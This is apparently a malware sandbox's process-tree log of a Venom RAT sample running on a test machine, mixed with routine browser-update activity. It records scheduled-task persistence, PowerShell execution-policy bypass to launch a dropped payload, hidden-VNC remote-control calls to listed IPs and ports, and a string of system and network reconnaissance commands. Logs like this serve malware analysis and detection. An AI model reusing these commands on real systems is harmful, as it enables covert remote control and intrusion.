C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5304 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3244 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2528 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1456 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5676 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2436 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6264 /prefetch:83⤵
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\Venom_RAT_COMPILED\ClientsFolder\27230CB0A6DA4D718BCE\Information\Information.txt2⤵
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir1488_1856115639\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir1488_1856115639\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={35caa69e-8c78-45bc-b3ce-e9f90a1afcd9} --system2⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultbb56006chff22h4cc1hb957h9f09ddb05f7f1⤵
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9f9ec46f8,0x7ff9f9ec4708,0x7ff9f9ec47182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,1545347753915878439,17642609852993246899,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,1545347753915878439,17642609852993246899,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,1545347753915878439,17642609852993246899,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:82⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2d0 0x2f01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\Venom_RAT_COMPILED\Client.exe"C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\Venom_RAT_COMPILED\Client.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "poop_cheez" /tr '"C:\Users\Admin\AppData\Roaming\poop_cheez.exe"' & exit2⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "poop_cheez" /tr '"C:\Users\Admin\AppData\Roaming\poop_cheez.exe"'3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1093.tmp.bat""2⤵
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\poop_cheez.exe"C:\Users\Admin\AppData\Roaming\poop_cheez.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"'5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\ClientH.exe"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 10.100.102.1 4448 DBpzhChHX.exe7⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"'5⤵
-
C:\Users\Admin\AppData\Local\Temp\ClientH.exe"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 10.127.0.104 4448 QcDkQVwrz.exe7⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"'5⤵
-
C:\Users\Admin\AppData\Local\Temp\ClientH.exe"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"6⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 127.0.0.1 4449 VxcSzXvmB.exe7⤵
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe"4⤵
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
-
-
C:\Windows\system32\HOSTNAME.EXEhostname5⤵
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername5⤵
- Collects information from the system
-
-
C:\Windows\system32\net.exenet user5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user6⤵
-
-
-
C:\Windows\system32\query.exequery user5⤵
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"6⤵
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command5⤵
-
-
C:\Windows\system32\tasklist.exetasklist /svc5⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\net.exenet user administrator5⤵
-
-
C:\Windows\system32\net.exenet user guest5⤵
-
-
C:\Windows\system32\net.exenet localgroup administrators5⤵
-
-
C:\Windows\system32\net.exenet localgroup5⤵
-
-
C:\Windows\system32\ROUTE.EXEroute print5⤵
-
-
C:\Windows\system32\ARP.EXEarp -a5⤵
-
-
C:\Windows\system32\ipconfig.exeipconfig /all5⤵
- Gathers network information
-
-
C:\Windows\system32\sc.exesc query type= service state= all5⤵
- Launches sc.exe
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano5⤵
- Gathers network information
-
-
C:\Windows\system32\netsh.exenetsh firewall show state5⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\netsh.exenetsh firewall show config5⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"'5⤵
-
C:\Users\Admin\AppData\Local\Temp\ClientH.exe"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 127.0.0.1 4449 VxcSzXvmB.exe7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 127.0.0.1 4449 VxcSzXvmB.exe7⤵
-
-
-
-
-
-
-
C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\ClientH.exe"C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\ClientH.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 10.100.102.1 4448 DBpzhChHX.exe2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\ClientH.exe"C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\ClientH.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 10.100.102.1 4448 DBpzhChHX.exe2⤵
-
-
C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\ClientH.exe"C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\ClientH.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 10.100.102.1 4448 DBpzhChHX.exe2⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 10.100.102.1 4448 DBpzhChHX.exe2⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 10.100.102.1 4448 DBpzhChHX.exe2⤵
-
-
C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\ClientH.exe"C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\ClientH.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 10.100.102.1 4448 DBpzhChHX.exe2⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"1⤵
-
C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir1040_662113012\msedgerecovery.exe"C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir1040_662113012\msedgerecovery.exe" --appguid={56EB18F8-B008-4CBD-B6D2-8C97FE7E9062} --browser-version=92.0.902.67 --sessionid={5cdf8343-23e8-463a-bd96-5a1921acf470} --system2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir1040_662113012\MicrosoftEdgeUpdateSetup.exe"C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir1040_662113012\MicrosoftEdgeUpdateSetup.exe" /install "runtime=true&needsadmin=true" /installsource chromerecovery /silent3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Temp\EU8F6F.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU8F6F.tmp\MicrosoftEdgeUpdate.exe" /install "runtime=true&needsadmin=true" /installsource chromerecovery /silent4⤵
- Sets file execution options in registry
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.169.31\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.169.31\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.169.31\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.169.31\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.169.31\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.169.31\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNjkuMzEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNjkuMzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkRGREI5MDMtQzJDMi00NUJCLUE5RUItOEQ0QzkzMTA1NzJCfSIgdXNlcmlkPSJ7NkE2ODdCNkYtNEVCRi00QTFGLUFDRkEtMEFDQTA1NTVEMjJEfSIgaW5zdGFsbHNvdXJjZT0iY2hyb21lcmVjb3ZlcnkiIHJlcXVlc3RpZD0ie0U4QkUxMDE4LTU5NDUtNDhBOC05OTdFLUUzOTg4N0I0QUVCRX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgbG9naWNhbF9jcHVzPSIyIiBwaHlzbWVtb3J5PSI0IiBkaXNrX3R5cGU9IjIiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDEuMTI4OCIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSJEQURZIiBwcm9kdWN0X25hbWU9IlN0YW5kYXJkIFBDIChRMzUgKyBJQ0g5LCAyMDA5KSIvPjxleHAgZXRhZz0iJnF1b3Q7bTQ2SzVLNXoxdnZrTkxIcjRjMXgvaENqZTdaUUxkcUt5WjVOd2d6VjNBOD0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMS4zLjE2OS4zMSIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTMyODAxMzYwOTQiIGluc3RhbGxfdGltZV9tcz0iODkxIi8-PC9hcHA-PC9yZXF1ZXN0Pg5⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /machine /installsource chromerecovery3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNjkuMzEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNjkuMzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUQ0QjE1RDgtOTA2OS00ODIwLUEwRDUtOTQ1RTQ5N0Y0NjE1fSIgdXNlcmlkPSJ7NkE2ODdCNkYtNEVCRi00QTFGLUFDRkEtMEFDQTA1NTVEMjJEfSIgaW5zdGFsbHNvdXJjZT0iY2hyb21lcmVjb3ZlcnkiIHJlcXVlc3RpZD0iezE1NzBCNzNGLTlGMjMtNDdEMi04QzJELTJCMDg1MDkxQTI2OH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgbG9naWNhbF9jcHVzPSIyIiBwaHlzbWVtb3J5PSI0IiBkaXNrX3R5cGU9IjIiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDEuMTI4OCIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSJEQURZIiBwcm9kdWN0X25hbWU9IlN0YW5kYXJkIFBDIChRMzUgKyBJQ0g5LCAyMDA5KSIvPjxleHAgZXRhZz0iJnF1b3Q7cVdKU3pXd1BmZGNMUitYR0l2NnhyWmZpWU94aFBVMnMxTldtaldjYUZQZz0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iODkuMC40Mzg5LjExNCIgbmV4dHZlcnNpb249Ijg5LjAuNDM4OS4xMTQiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSI1IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMzUyNTIwNTQyNiIvPjwvYXBwPjwvcmVxdWVzdD42⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{7E25A86C-076C-498E-BD1D-60C14A66DA72}\MicrosoftEdgeUpdateSetup_X86_1.3.171.39.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{7E25A86C-076C-498E-BD1D-60C14A66DA72}\MicrosoftEdgeUpdateSetup_X86_1.3.171.39.exe" /update /sessionid "{1D4B15D8-9069-4820-A0D5-945E497F4615}"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Temp\EU50D.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU50D.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{1D4B15D8-9069-4820-A0D5-945E497F4615}"3⤵
- Sets file execution options in registry
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
-
-
